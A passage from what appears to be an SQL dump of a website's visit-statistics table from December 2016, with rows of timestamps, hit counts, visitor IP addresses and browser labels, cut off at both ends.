75.187',''),(77680,1481075722,1,0,1,0,'66.249.75.183',''),(77681,1481076941,1,1,0,0,'163.172.64.224','other'),(77682,1481077809,1,1,0,0,'66.249.75.187','chrome'),(77683,1481077942,1,0,1,0,'66.249.75.183',''),(77684,1481080297,2,0,2,0,'68.180.228.223',''),(77685,1481082120,1,0,1,0,'66.249.75.179',''),(77686,1481082757,1,0,1,0,'66.249.75.187',''),(77687,1481083236,1,0,1,0,'66.249.75.179',''),(77688,1481084317,1,0,1,0,'68.180.228.223',''),(77689,1481085458,1,0,1,0,'66.249.75.187',''),(77690,1481085614,1,1,0,0,'66.102.9.61','chrome'),(77691,1481087346,1,1,0,0,'180.76.15.134','other'),(77692,1481087591,2,0,2,0,'66.249.75.183',''),(77693,1481088588,1,1,0,0,'163.172.64.179','other'),(77694,1481089226,1,1,0,0,'163.172.64.177','other'),(77695,1481090661,1,1,0,0,'207.46.13.121','other'),(77696,1481091358,1,1,0,0,'91.196.177.46','chrome'),(77697,1481091527,1,0,1,0,'66.249.69.152',''),(77698,1481092341,1,1,0,0,'163.172.64.178','other'),(77699,1481092368,1,1,0,0,'92.112.71.245','firefox'),(77700,1481092496,2,2,0,0,'91.196.178.68','firefox'),(77701,1481092888,1,1,0,0,'157.55.39.124','other'),(77702,1481093758,1,1,0,0,'130.193.50.34','other'),(77703,1481094173,1,0,1,0,'66.249.75.179',''),(77704,1481094805,1,1,0,0,'46.200.148.222','firefox'),(77705,1481094821,1,1,0,0,'130.193.50.34','other'),(77706,1481094952,1,1,0,0,'91.196.178.68','firefox'),(77707,1481095443,1,1,0,0,'91.196.178.69','chrome'),(77708,1481096003,1,0,1,0,'66.249.75.183',''),(77709,1481096099,1,1,0,0,'195.182.203.13','firefox'),(77710,1481096332,1,1,0,0,'157.55.39.124','other'),(77711,1481096467,1,1,0,0,'94.179.74.103','firefox'),(77712,1481096572,1,1,0,0,'91.124.5.162','opera'),(77713,1481096612,1,1,0,0,'163.172.64.192','other'),(77714,1481096638,1,1,0,0,'163.172.64.250','other'),(77715,1481097130,1,0,1,0,'66.249.75.179',''),(77716,1481097253,1,0,1,0,'66.249.75.183',''),(77717,1481097479,1,1,0,0,'66.249.93.158','chrome'),(77718,1481097800,1,1,0,0,'91.196.178.69','firefox'),(77719,1481098047,1,1,0,0,'91.196.177.26','chrome'),(77720,1481098429,1,1,0,0,'54.145.156.132','other'),(77721,1481099025,1,1,0,0,'91.196.177.26','chrome'),(77722,1481100382,8,8,0,0,'176.104.37.122','other'),(77723,1481100553,1,1,0,0,'91.196.178.65','chrome'),(77724,1481101813,1,1,0,0,'37.52.117.97','opera'),(77725,1481102538,1,0,1,0,'66.249.69.155',''),(77726,1481102807,1,1,0,0,'66.102.9.61','other'),(77727,1481103892,1,0,1,0,'68.180.228.223',''),(77728,1481104433,2,0,2,0,'66.249.75.183',''),(77729,1481104957,1,1,0,0,'95.132.134.83','firefox'),(77730,1481105078,1,0,1,0,'66.249.75.187',''),(77731,1481105231,1,1,0,0,'91.196.178.68','firefox'),(77732,1481105327,1,0,1,0,'68.180.228.223',''),(77733,1481105962,1,1,0,0,'130.180.218.123','firefox'),(77734,1481106084,1,0,1,0,'66.249.75.183',''),(77735,1481106140,1,0,1,0,'66.249.69.152',''),(77736,1481106478,1,1,0,0,'178.95.246.126','firefox'),(77737,1481106769,1,1,0,0,'157.55.39.124','other'),(77738,1481107404,1,0,1,0,'68.180.229.190',''),(77739,1481107544,1,0,1,0,'66.249.69.149',''),(77740,1481109239,1,0,1,0,'66.249.75.183',''),(77741,1481109497,1,1,0,0,'91.196.178.40','firefox'),(77742,1481112155,2,2,0,0,'91.196.178.68','firefox'),(77743,1481112173,1,1,0,0,'141.8.183.25','other'),(77744,1481112200,1,1,0,0,'163.172.64.216','other'),(77745,1481113377,1,1,0,0,'91.196.178.69','chrome'),(77746,1481114374,1,0,1,0,'66.249.75.187',''),(77747,1481114536,1,1,0,0,'91.196.177.94','chrome'),(77748,1481114633,1,1,0,0,'91.196.178.168','chrome'),(77749,1481114908,1,1,0,0,'163.172.64.247','other'),(77750,1481115262,1,1,0,0,'130.193.51.19','other'),(77751,1481115270,1,1,0,0,'178.95.246.126','firefox'),(77752,1481115347,1,1,0,0,'91.196.178.69','firefox'),(77753,1481115472,1,1,0,0,'91.196.178.167','firefox'),(77754,1481115551,1,1,0,0,'91.196.178.36','chrome'),(77755,1481115574,1,1,0,0,'91.196.177.94','chrome'),(77756,1481115844,1,1,0,0,'46.219.252.144','chrome'),(77757,1481115910,1,1,0,0,'91.124.180.117','firefox'),(77758,1481116283,1,0,1,0,'66.249.75.187',''),(77759,1481116559,1,1,0,0,'94.179.87.7','chrome'),(77760,1481116765,1,1,0,0,'141.8.142.61','other'),(77761,1481116813,1,1,0,0,'91.196.178.39','chrome'),(77762,1481116904,1,1,0,0,'95.132.134.83','firefox'),(77763,1481116994,1,1,0,0,'91.124.180.117','firefox'),(77764,1481117412,1,1,0,0,'66.102.9.27','other'),(77765,1481118129,1,1,0,0,'91.124.180.117','firefox'),(77766,1481118622,1,1,0,0,'213.108.45.138','chrome'),(77767,1481118918,1,1,0,0,'130.180.218.125','chrome'),(77768,1481118925,1,1,0,0,'91.196.178.39','chrome'),(77769,1481119024,1,1,0,0,'91.196.178.67','firefox'),(77770,1481119288,1,1,0,0,'91.124.180.117','firefox'),(77771,1481119800,1,1,0,0,'180.76.15.11','other'),(77772,1481119884,1,1,0,0,'130.193.51.19','other'),(77773,1481119895,1,1,0,0,'31.13.102.100','other'),(77774,1481119914,1,1,0,0,'31.13.98.118','other'),(77776,1481119969,1,1,0,0,'91.196.177.46','chrome'),(77777,1481120036,1,1,0,0,'37.73.243.242','chrome'),(77778,1481120206,1,0,1,0,'66.249.69.155',''),(77779,1481120420,1,1,0,0,'91.196.178.168','chrome'),(77780,1481120536,1,0,1,0,'66.249.69.152',''),(77781,1481120763,3,3,0,0,'91.196.177.46','firefox'),(77782,1481121028,1,1,0,0,'91.196.177.15','chrome'),(77783,1481121066,1,1,0,0,'91.196.178.102','chrome'),(77784,1481121106,1,1,0,0,'91.196.178.129','chrome'),(77785,1481121960,1,0,1,0,'66.249.69.155',''),(77786,1481122183,1,1,0,0,'95.84.183.176','chrome'),(77787,1481122700,1,1,0,0,'91.196.178.135','firefox'),(77788,1481122857,1,1,0,0,'180.76.15.6','other'),(77789,1481123216,1,1,0,0,'82.145.223.128','other'),(77790,1481123866,1,0,1,0,'66.249.75.179',''),(77791,1481123889,1,1,0,0,'91.196.177.46','firefox'),(77792,1481124240,1,1,0,0,'91.142.175.4','chrome'),(77793,1481124572,1,0,1,0,'66.249.75.187',''),(77794,1481124720,1,0,1,0,'66.249.75.183',''),(77795,1481124866,1,1,0,0,'180.76.15.153','other'),(77796,1481126093,1,1,0,0,'91.124.180.117','firefox'),(77797,1481126390,1,0,1,0,'66.249.75.183',''),(77798,1481127665,1,1,0,0,'91.196.178.131','chrome'),(77799,1481128322,1,1,0,0,'163.172.64.182','other'),(77800,1481128716,1,1,0,0,'82.145.223.66','other'),(77801,1481129120,1,0,1,0,'66.249.75.187',''),(77802,1481129130,1,1,0,0,'66.102.9.27','chrome'),(77803,1481129652,1,1,0,0,'141.8.183.25','other'),(77804,1481130180,1,1,0,0,'130.193.50.34','other'),(77805,1481130478,1,0,1,0,'66.249.75.183',''),(77806,1481131199,1,0,1,0,'66.249.75.179',''),(77807,1481131730,1,1,0,0,'66.102.9.29','other'),(77808,1481134505,2,2,0,0,'94.179.106.96','firefox'),(77809,1481134948,1,1,0,0,'66.249.75.187','chrome'),(77810,1481135036,1,1,0,0,'157.55.39.124','other'),(77811,1481135406,1,1,0,0,'94.179.106.96','firefox'),(77812,1481135676,1,1,0,0,'91.196.178.130','chrome'),(77813,1481135853,1,1,0,0,'66.249.69.149','chrome'),(77814,1481136007,1,1,0,0,'91.196.178.161','other'),(77815,1481138294,1,1,0,0,'66.249.69.152','chrome'),(77816,1481138939,1,1,0,0,'46.211.200.100','chrome'),(77817,1481139794,1,1,0,0,'91.196.178.165','chrome'),(77818,1481139884,9,9,0,0,'91.121.97.49','other'),(77819,1481140231,1,1,0,0,'91.124.180.117','firefox'),(77820,1481140871,1,0,1,0,'66.249.75.179',''),(77821,1481140963,1,1,0,0,'31.13.98.116','other'),(77822,1481141430,1,0,1,0,'66.249.75.187',''),(77824,1481141486,1,1,0,0,'91.124.180.117','firefox'),(77825,1481141506,1,1,0,0,'91.196.178.97','chrome'),(77826,1481141720,1,1,0,0,'66.249.75.179','chrome'),(77827,1481142608,1,1,0,0,'163.172.64.235','other'),(77828,1481143140,1,0,1,0,'66.249.75.187',''),(77829,1481143185,1,1,0,0,'163.172.64.244','other'),(77830,1481144023,1,1,0,0,'46.149.89.196','firefox'),(77831,1481144888,1,0,1,0,'66.249.69.155',''),(77832,1481145284,1,1,0,0,'157.55.39.124','other'),(77833,1481146125,1,1,0,0,'66.102.9.29','other'),(77834,1481146339,1,1,0,0,'188.163.16.90','chrome'),(77835,1481146348,1,1,0,0,'141.8.183.25','other'),(77836,1481148078,1,1,0,0,'141.8.183.25','other'),(77837,1481149294,1,1,0,0,'66.249.75.183','chrome'),(77838,1481150042,1,1,0,0,'163.172.64.241','other'),(77839,1481150546,1,0,1,0,'66.249.75.183',''),(77840,1481152853,1,1,0,0,'66.249.75.187','chrome'),(77841,1481154420,1,1,0,0,'163.172.64.237','other'),(77842,1481155937,1,1,0,0,'66.249.75.187','chrome'),(77843,1481156243,1,1,0,0,'66.249.69.152','chrome'),(77844,1481156251,1,1,0,0,'66.249.75.179','chrome'),(77845,1481157589,2,0,2,0,'66.249.75.183',''),(77846,1481158469,1,1,0,0,'83.233.207.74','other'),(77847,1481159641,1,1,0,0,'163.172.64.181','other'),(77848,1481160531,1,1,0,0,'66.102.9.25','other'),(77849,1481161497,1,1,0,0,'207.46.13.121','other'),(77850,1481162365,1,0,1,0,'66.249.75.187',''),(77851,1481162886,1,1,0,0,'66.249.75.179','chrome'),(77852,1481164191,1,1,0,0,'66.249.69.149','chrome'),(77854,1481168643,1,1,0,0,'82.145.223.56','opera'),(77855,1481169775,1,0,1,0,'66.249.75.183',''),(77856,1481171619,1,1,0,0,'82.145.223.132','other'),(77857,1481172239,1,1,0,0,'212.86.228.38','firefox'),(77858,1481172488,1,1,0,0,'66.249.75.187','chrome'),(77859,1481173428,1,1,0,0,'212.86.228.38','firefox'),(77860,1481173962,1,1,0,0,'66.249.69.149','chrome'),(77861,1481174713,1,0,1,0,'66.249.69.152',''),(77862,1481174759,1,1,0,0,'37.73.224.215','chrome'),(77863,1481174936,1,1,0,0,'66.102.9.29','other'),(77864,1481177720,1,1,0,0,'91.196.177.46','chrome'),(77865,1481177726,1,1,0,0,'195.138.217.229','firefox'),(77866,1481178364,2,2,0,0,'91.196.178.68','firefox'),(77867,1481178421,1,1,0,0,'91.196.178.69','firefox'),(77868,1481178455,1,1,0,0,'91.196.178.68','chrome'),(77869,1481178776,1,1,0,0,'91.196.178.39','chrome'),(77870,1481178953,1,1,0,0,'91.196.178.35','chrome'),(77871,1481180120,1,1,0,0,'91.196.178.68','firefox'),(77872,1481180185,1,1,0,0,'91.196.178.39','chrome'),(77873,1481180199,1,1,0,0,'91.196.177.46','firefox'),(77874,1481180448,1,1,0,0,'91.196.178.71','firefox'),(77875,1481180741,1,1,0,0,'91.196.179.33','chrome'),(77876,1481181022,2,2,0,0,'91.196.177.46','chrome'),(77877,1481181043,1,1,0,0,'91.196.178.68','firefox'),(77878,1481182675,1,1,0,0,'92.112.45.36','firefox'),(77879,1481183142,2,2,0,0,'141.8.142.61','other'),(77880,1481183702,1,1,0,0,'91.196.178.69','firefox'),(77881,1481184101,1,0,1,0,'66.249.75.187',''),(77882,1481184132,1,0,1,0,'66.249.69.149',''),(77883,1481184381,1,0,1,0,'66.249.69.152',''),(77884,1481184541,2,2,0,0,'91.196.178.65','firefox'),(77885,1481184591,1,1,0,0,'91.142.164.118','chrome'),(77886,1481184961,2,0,2,0,'66.249.75.183',''),(77887,1481185003,1,1,0,0,'180.76.15.134','other'),(77888,1481185084,1,1,0,0,'82.145.223.56','opera'),(77889,1481185339,1,1,0,0,'91.196.178.69','firefox'),(77890,1481185565,1,1,0,0,'66.249.75.187','chrome'),(77891,1481186057,1,0,1,0,'66.249.75.183',''),(77892,1481186123,1,0,1,0,'66.249.75.179',''),(77893,1481186185,11,11,0,0,'193.70.39.164','other'),(77894,1481186594,1,1,0,0,'91.196.178.39','chrome'),(77895,1481186739,4,4,0,0,'91.196.177.46','chrome'),(77896,1481187124,1,1,0,0,'82.145.223.134','other'),(77897,1481187133,2,2,0,0,'94.179.9.29','firefox'),(77898,1481187520,1,1,0,0,'91.196.178.69','firefox'),(77899,1481187946,1,1,0,0,'95.134.220.220','firefox'),(77900,1481187982,1,1,0,0,'40.77.167.82','other'),(77901,1481188865,1,1,0,0,'66.249.75.179','chrome'),(77902,1481189096,1,1,0,0,'66.249.69.152','chrome'),(77903,1481189385,1,1,0,0,'66.102.9.29','other'),(77904,1481189419,1,1,0,0,'91.196.177.26','chrome'),(77905,1481189448,1,1,0,0,'91.196.178.67','chrome'),(77906,1481189579,1,0,1,0,'66.249.69.155',''),(77907,1481189829,1,1,0,0,'163.172.64.248','other'),(77908,1481190344,1,1,0,0,'37.55.117.16','opera'),(77909,1481190777,1,1,0,0,'163.172.64.246','other'),(77910,1481191275,1,1,0,0,'163.172.64.223','other'),(77911,1481192080,1,0,1,0,'66.249.69.149',''),(77912,1481192140,1,1,0,0,'91.196.178.69','firefox'),(77913,1481192170,1,1,0,0,'66.249.69.155','chrome'),(77914,1481192381,1,1,0,0,'91.196.178.69','chrome'),(77915,1481192847,1,1,0,0,'91.196.178.99','chrome'),(77916,1481192968,1,0,1,0,'66.249.75.179',''),(77917,1481194105,1,1,0,0,'91.196.178.67','chrome'),(77918,1481194811,1,1,0,0,'91.196.178.65','chrome'),(77919,1481195186,1,1,0,0,'91.196.178.69','firefox'),(77920,1481197059,1,1,0,0,'91.196.178.168','chrome'),(77921,1481197888,1,1,0,0,'91.196.177.8','chrome'),(77922,1481198084,1,1,0,0,'91.196.178.39','chrome'),(77923,1481198906,1,1,0,0,'95.132.8.151','firefox'),(77924,1481198924,1,0,1,0,'66.249.75.183',''),(77925,1481199074,1,1,0,0,'130.180.217.54','firefox'),(77926,1481199659,1,1,0,0,'91.196.178.162','chrome'),(77927,1481200089,2,2,0,0,'95.158.3.62','chrome'),(77928,1481200240,1,1,0,0,'91.196.178.72','firefox'),(77929,1481200242,1,0,1,0,'66.249.75.183',''),(77930,1481200346,1,1,0,0,'95.132.8.151','firefox'),(77931,1481200773,1,1,0,0,'91.195.173.69','chrome'),(77932,1481200876,1,1,0,0,'91.196.178.130','firefox'),(77933,1481201674,1,1,0,0,'91.197.80.24','firefox'),(77934,1481202111,1,1,0,0,'82.145.220.111','other'),(77935,1481202242,1,0,1,0,'66.249.75.183',''),(77936,1481202843,1,1,0,0,'91.196.178.68','firefox'),(77937,1481203128,1,0,1,0,'66.249.75.179',''),(77938,1481203673,1,1,0,0,'212.79.125.228','chrome'),(77939,1481203682,2,0,2,0,'66.249.75.183',''),(77940,1481203759,1,1,0,0,'66.102.9.29','other'),(77941,1481203997,1,1,0,0,'37.53.134.185','firefox'),(77942,1481204244,1,1,0,0,'91.196.178.70','chrome'),(77943,1481204484,1,1,0,0,'92.112.248.227','chrome'),(77944,1481204575,4,4,0,0,'91.196.178.68','firefox'),(77945,1481205791,1,1,0,0,'82.145.222.70','chrome'),(77946,1481205895,1,1,0,0,'66.249.69.155','chrome'),(77947,1481206089,1,1,0,0,'91.196.178.68','firefox'),(77948,1481206310,1,1,0,0,'194.50.254.169','chrome'),(77949,1481206452,1,1,0,0,'91.196.177.46','firefox'),(77951,1481207136,1,0,1,0,'66.249.75.179',''),(77952,1481207625,1,1,0,0,'163.172.64.199','other'),(77953,1481207634,2,0,2,0,'66.249.69.155',''),(77954,1481207785,1,1,0,0,'40.77.167.82','other'),(77955,1481208057,1,1,0,0,'94.179.91.154','chrome'),(77956,1481208134,1,0,1,0,'66.249.75.183',''),(77957,1481208258,1,1,0,0,'91.196.178.36','chrome'),(77958,1481208777,1,1,0,0,'130.180.216.138','chrome'),(77959,1481208929,1,1,0,0,'163.172.64.247','other'),(77960,1481209427,1,1,0,0,'8.37.233.107','other'),(77961,1481209778,1,0,1,0,'66.249.75.187',''),(77962,1481211338,1,1,0,0,'141.8.142.58','other'),(77963,1481211682,12,12,0,0,'46.118.154.218','other'),(77964,1481211820,1,0,1,0,'66.249.75.187',''),(77965,1481212515,1,1,0,0,'91.196.178.164','other'),(77966,1481212567,1,1,0,0,'130.193.50.34','other'),(77967,1481212642,1,1,0,0,'163.172.64.225','other'),(77968,1481212675,1,1,0,0,'141.8.142.61','other'),(77969,1481213039,1,0,1,0,'66.249.75.179',''),(77970,1481213324,2,2,0,0,'46.219.3.139','chrome'),(77971,1481213327,1,1,0,0,'207.241.226.218','other'),(77972,1481214021,1,1,0,0,'163.172.64.178','other'),(77973,1481215713,1,0,1,0,'66.249.75.183',''),(77974,1481216042,1,1,0,0,'91.124.180.117','firefox'),(77975,1481217354,1,1,0,0,'163.172.64.232','other'),(77976,1481217394,1,0,1,0,'66.249.75.183',''),(77977,1481217425,1,1,0,0,'91.196.178.71','chrome'),(77978,1481217539,1,1,0,0,'94.179.13.63','chrome'),(77979,1481217805,2,2,0,0,'81.213.190.81','other'),(77980,1481217952,1,1,0,0,'180.76.15.12','other'),(77981,1481218206,1,1,0,0,'66.102.9.29','other'),(77982,1481219390,1,1,0,0,'91.196.178.66','firefox'),(77983,1481219962,1,1,0,0,'180.76.15.148','other'),(77984,1481220451,1,1,0,0,'180.76.15.137','other'),(77985,1481221151,1,1,0,0,'91.196.178.71','chrome'),(77986,1481221382,1,1,0,0,'82.145.221.156','other'),(77987,1481221746,1,1,0,0,'163.172.64.250','other'),(77988,1481222225,1,1,0,0,'163.172.64.185','other'),(77989,1481222460,1,1,0,0,'180.76.15.148','other'),(77990,1481222759,1,0,1,0,'68.180.229.190',''),(77991,1481222904,1,1,0,0,'46.211.70.40','chrome'),(77992,1481223340,1,1,0,0,'91.196.178.161','chrome'),(77993,1481225086,1,1,0,0,'92.113.126.198','chrome'),(77994,1481225256,1,1,0,0,'163.172.64.223','other'),(77995,1481225844,1,1,0,0,'141.8.183.25','other'),(77996,1481226453,1,1,0,0,'40.77.167.76','other'),(77997,1481229001,1,1,0,0,'91.222.1.33','chrome'),(77998,1481229189,2,0,2,0,'68.180.228.223',''),(77999,1481230952,1,1,0,0,'163.172.64.245','other'),(78000,1481232423,1,0,1,0,'66.249.75.183',''),(78001,1481232591,1,1,0,0,'66.102.9.29','other'),(78002,1481232926,1,1,0,0,'163.172.64.243','other'),(78003,1481233248,1,0,1,0,'66.249.75.179',''),(78004,1481233477,1,1,0,0,'66.249.75.183','chrome'),(78005,1481235284,1,1,0,0,'46.133.236.141','chrome'),(78006,1481236686,1,1,0,0,'163.172.64.229','other'),(78007,1481237555,1,0,1,0,'66.249.75.179',''),(78008,1481238458,1,0,1,0,'66.249.69.60',''),(78009,1481238653,1,1,0,0,'141.8.183.25','other'),(78010,1481240091,1,0,1,0,'68.180.228.223',''),(78011,1481243235,4,4,0,0,'62.138.8.181','other'),(78012,1481245174,1,1,0,0,'93.158.152.51','other'),(78013,1481250030,1,1,0,0,'163.172.64.246','other'),(78014,1481253217,1,1,0,0,'66.249.75.183','chrome'),(78015,1481255684,1,1,0,0,'130.193.51.19','other'),(78016,1481255993,1,0,1,0,'66.249.75.179',''),(78017,1481258745,1,0,1,0,'66.249.69.155',''),(78018,1481261278,1,1,0,0,'180.76.15.30','other'),(78019,1481261447,1,0,1,0,'66.249.75.183',''),(78020,1481261543,1,0,1,0,'68.180.228.223',''),(78021,1481262297,1,1,0,0,'91.196.178.67','firefox'),(78022,1481263189,1,1,0,0,'163.172.64.181','other'),(78023,1481264154,1,1,0,0,'91.196.178.70','chrome'),(78024,1481265029,1,1,0,0,'91.196.178.39','chrome'),(78025,1481265521,1,0,1,0,'66.249.69.149',''),(78026,1481265684,1,0,1,0,'66.249.69.152',''),(78027,1481266045,1,1,0,0,'130.193.50.34','other'),(78028,1481266170,1,1,0,0,'141.8.183.25','other'),(78029,1481266213,1,1,0,0,'66.249.69.152','chrome'),(78030,1481266235,1,1,0,0,'91.196.178.68','firefox'),(78031,1481266461,1,1,0,0,'95.132.134.159','chrome'),(78032,1481266627,1,1,0,0,'66.102.9.27','other'),(78033,1481268269,1,1,0,0,'95.134.43.215','chrome'),(78034,1481268645,1,1,0,0,'163.172.64.193','other'),(78035,1481268664,1,1,0,0,'66.102.9.29','chrome'),(78036,1481269094,1,1,0,0,'91.196.178.70','chrome'),(78037,1481269103,2,2,0,0,'91.196.178.68','firefox'),(78038,1481269656,1,1,0,0,'37.53.239.221','firefox'),(78039,1481270185,1,1,0,0,'130.193.51.19','other'),(78040,1481270454,1,1,0,0,'91.196.178.39','chrome'),(78041,1481271193,1,1,0,0,'91.196.178.70','chrome'),(78042,1481271529,1,1,0,0,'91.196.178.72','firefox'),(78043,1481271898,1,1,0,0,'91.196.178.39','chrome'),(78044,1481271945,1,1,0,0,'157.55.39.62','other'),(78045,1481272542,1,1,0,0,'95.135.167.121','chrome'),(78046,1481272588,1,1,0,0,'163.172.64.226','other'),(78047,1481272779,1,1,0,0,'37.53.90.175','firefox'),(78048,1481273037,1,1,0,0,'91.196.178.65','firefox'),(78049,1481274478,1,1,0,0,'31.43.1.147','chrome'),(78050,1481275312,1,1,0,0,'163.172.64.177','other'),(78051,1481275700,1,1,0,0,'37.53.71.66','firefox'),(78052,1481275706,1,1,0,0,'93.158.152.51','other'),(78053,1481275793,1,1,0,0,'66.102.9.27','other'),(78054,1481276749,2,2,0,0,'51.255.51.68','other'),(78055,1481277238,1,1,0,0,'91.196.178.70','firefox'),(78056,1481277505,1,1,0,0,'141.0.12.58','other'),(78057,1481278194,1,1,0,0,'91.196.178.69','firefox'),(78058,1481278199,1,1,0,0,'141.8.183.25','other'),(78059,1481278248,1,1,0,0,'91.196.178.67','firefox'),(78060,1481279097,1,0,1,0,'66.249.75.179',''),(78061,1481279111,1,1,0,0,'163.172.64.193','other'),(78062,1481280061,2,2,0,0,'91.196.177.46','firefox'),(78063,1481280556,2,1,1,0,'66.249.75.183',''),(78064,1481281467,1,1,0,0,'95.132.132.163','firefox'),(78065,1481282610,1,1,0,0,'46.211.112.4','other'),(78066,1481282985,1,1,0,0,'195.49.151.99','chrome'),(78067,1481283115,1,1,0,0,'66.249.69.152','chrome'),(78068,1481283203,1,1,0,0,'37.55.58.27','chrome'),(78069,1481283740,1,0,1,0,'66.249.75.179',''),(78070,1481283988,1,1,0,0,'91.196.178.36','chrome'),(78071,1481284170,1,1,0,0,'163.172.64.188','other'),(78072,1481284595,1,1,0,0,'91.196.178.129','chrome'),(78073,1481285691,1,1,0,0,'91.196.178.68','firefox'),(78074,1481286136,1,1,0,0,'157.55.39.44','other'),(78075,1481286325,1,1,0,0,'109.162.127.84','chrome'),(78076,1481286854,1,1,0,0,'91.196.178.65','firefox'),(78077,1481288332,1,1,0,0,'91.196.177.26','chrome'),(78078,1481288620,1,1,0,0,'163.172.64.179','other'),(78079,1481289616,2,2,0,0,'91.196.178.68','firefox'),(78080,1481290235,1,1,0,0,'66.102.9.25','other'),(78081,1481290548,3,0,3,0,'66.249.69.56',''),(78082,1481292085,1,1,0,0,'95.132.135.77','chrome'),(78083,1481292297,1,0,1,0,'66.249.69.60',''),(78084,1481292382,1,1,0,0,'163.172.64.248','other'),(78085,1481292686,1,1,0,0,'188.32.97.55','msie'),(78086,1481292921,1,1,0,0,'163.172.64.216','other'),(78087,1481293937,1,1,0,0,'91.196.178.168','chrome'),(78088,1481294496,1,1,0,0,'91.196.179.33','chrome'),(78089,1481294696,1,1,0,0,'180.76.15.10','other'),(78090,1481295222,1,1,0,0,'178.140.168.14','msie'),(78091,1481295364,1,1,0,0,'93.80.145.208','msie'),(78092,1481297526,2,2,0,0,'130.193.50.34','other'),(78093,1481297530,1,0,1,0,'68.180.228.223',''),(78094,1481297631,1,1,0,0,'91.124.182.25','chrome'),(78095,1481298588,1,0,1,0,'66.249.69.60',''),(78096,1481298866,1,1,0,0,'163.172.64.244','other'),(78097,1481298967,1,0,1,0,'68.180.228.223',''),(78098,1481298992,1,1,0,0,'163.172.64.216','other'),(78099,1481300133,1,1,0,0,'91.124.180.117','firefox'),(78100,1481300247,1,0,1,0,'66.249.69.60',''),(78101,1481303380,1,1,0,0,'91.196.178.163','chrome'),(78102,1481303740,1,1,0,0,'66.249.69.56','chrome'),(78103,1481303801,1,1,0,0,'195.154.181.15','chrome'),(78104,1481303913,1,1,0,0,'163.172.64.245','other'),(78105,1481304490,1,1,0,0,'178.92.171.183','chrome'),(78106,1481304497,1,1,0,0,'141.8.183.25','other'),(78107,1481304725,1,1,0,0,'66.102.9.29','other'),(78108,1481305928,1,1,0,0,'91.196.178.129','chrome'),(78109,1481306595,1,1,0,0,'178.255.215.94','other'),(78110,1481307115,1,1,0,0,'163.172.64.222','other'),(78111,1481311292,1,1,0,0,'163.172.64.241','other'),(78112,1481311333,1,0,1,0,'68.180.229.190',''),(78113,1481311802,1,1,0,0,'163.172.64.253','other'),(78114,1481312665,1,1,0,0,'163.172.64.188','other'),(78115,1481313065,1,1,0,0,'91.124.180.117','firefox'),(78116,1481313716,1,0,1,0,'66.249.75.104',''),(78117,1481313736,1,1,0,0,'178.255.215.94','other'),(78118,1481313816,1,0,1,0,'66.249.69.60',''),(78119,1481313898,1,1,0,0,'95.132.133.170','chrome'),(78120,1481315309,1,1,0,0,'163.172.64.247','other'),(78121,1481315810,1,1,0,0,'157.55.39.209','other'),(78122,1481317841,1,1,0,0,'46.219.249.253','chrome'),(78123,1481317867,1,1,0,0,'95.132.135.70','firefox'),(78124,1481318073,1,0,1,0,'66.249.69.52',''),(78125,1481318304,1,1,0,0,'64.246.165.140','firefox'),(78126,1481318356,1,1,0,0,'94.179.29.226','chrome'),(78127,1481318460,1,1,0,0,'91.196.178.98','firefox'),(78128,1481319036,1,1,0,0,'66.102.9.29','other'),(78129,1481319911,1,1,0,0,'163.172.64.229','other'),(78130,1481320248,1,1,0,0,'95.52.173.159','other'),(78131,1481320508,1,0,1,0,'66.249.69.52',''),(78132,1481322652,1,1,0,0,'37.187.134.116','chrome'),(78133,1481323711,1,1,0,0,'66.102.9.25','chrome'),(78134,1481325015,1,1,0,0,'178.255.215.94','other'),(78135,1481327691,1,0,1,0,'66.249.69.52',''),(78136,1481330349,1,1,0,0,'178.255.215.94','other'),(78137,1481331007,1,0,1,0,'66.249.69.60',''),(78138,1481332547,1,1,0,0,'141.8.132.2','other'),(78139,1481333426,1,1,0,0,'66.102.9.27','other'),(78140,1481336886,1,1,0,0,'93.158.152.84','other'),(78141,1481340796,1,1,0,0,'207.46.13.114','other'),(78142,1481342778,1,0,1,0,'66.249.69.52',''),(78143,1481347588,1,1,0,0,'163.172.64.236','other'),(78144,1481347840,1,1,0,0,'66.102.9.27','other'),(78145,1481347954,1,1,0,0,'163.172.64.241','other'),(78146,1481348333,1,1,0,0,'82.145.220.27','other'),(78147,1481348856,1,1,0,0,'163.172.64.226','other'),(78148,1481350589,1,1,0,0,'217.69.133.169','firefox'),(78149,1481351833,2,2,0,0,'95.213.141.126','opera'),(78150,1481352334,1,1,0,0,'141.8.183.25','other'),(78151,1481352993,1,1,0,0,'103.25.155.229','firefox'),(78152,1481353200,1,0,1,0,'66.249.69.52',''),(78153,1481353570,1,1,0,0,'91.196.178.38','chrome'),(78154,1481356556,1,1,0,0,'180.76.15.158','other'),(78155,1481360704,1,1,0,0,'163.172.64.231','other'),(78156,1481360934,1,1,0,0,'52.86.176.3','other'),(78157,1481361510,1,1,0,0,'66.102.9.25','other'),(78158,1481362167,1,1,0,0,'66.249.69.60','chrome'),(78159,1481362185,1,1,0,0,'66.249.75.101','chrome'),(78160,1481362263,1,1,0,0,'130.193.50.34','other'),(78161,1481362265,1,1,0,0,'130.193.51.19','other'),(78162,1481362896,1,1,0,0,'163.172.64.243','other'),(78163,1481363005,1,0,1,0,'66.249.69.56',''),(78164,1481363761,1,1,0,0,'66.249.69.56','chrome'),(78165,1481366356,1,0,1,0,'66.249.69.60',''),(78166,1481366683,1,1,0,0,'163.172.64.231','other'),(78167,1481368242,1,1,0,0,'130.193.51.19','other'),(78168,1481368846,2,1,1,0,'66.249.69.60',''),(78169,1481369274,1,1,0,0,'78.111.185.133','firefox'),(78170,1481369473,2,2,0,0,'46.118.120.134','other'),(78171,1481369588,1,1,0,0,'180.76.15.163','other'),(78172,1481369931,1,1,0,0,'180.76.15.145','other'),(78173,1481370065,1,1,0,0,'5.45.192.67','chrome'),(78174,1481370642,1,1,0,0,'141.8.142.58','other'),(78175,1481370784,1,1,0,0,'217.69.133.215','other'),(78176,1481372165,1,1,0,0,'109.173.100.114','msie'),(78177,1481372528,1,1,0,0,'157.55.39.207','other'),(78178,1481374663,2,2,0,0,'66.249.69.60','chrome'),(78179,1481375962,1,1,0,0,'66.102.9.25','other'),(78180,1481377055,1,1,0,0,'163.172.64.249','other'),(78181,1481378409,1,1,0,0,'157.55.39.210','other'),(78182,1481378883,1,1,0,0,'91.196.178.36','chrome'),(78183,1481381927,1,1,0,0,'180.76.15.15','other'),(78184,1481382307,1,1,0,0,'130.193.51.19','other'),(78185,1481382309,1,1,0,0,'46.201.112.210','firefox'),(78186,1481384617,1,1,0,0,'66.249.93.157','chrome'),(78187,1481385182,1,1,0,0,'91.196.178.104','chrome'),(78188,1481386194,1,1,0,0,'163.172.6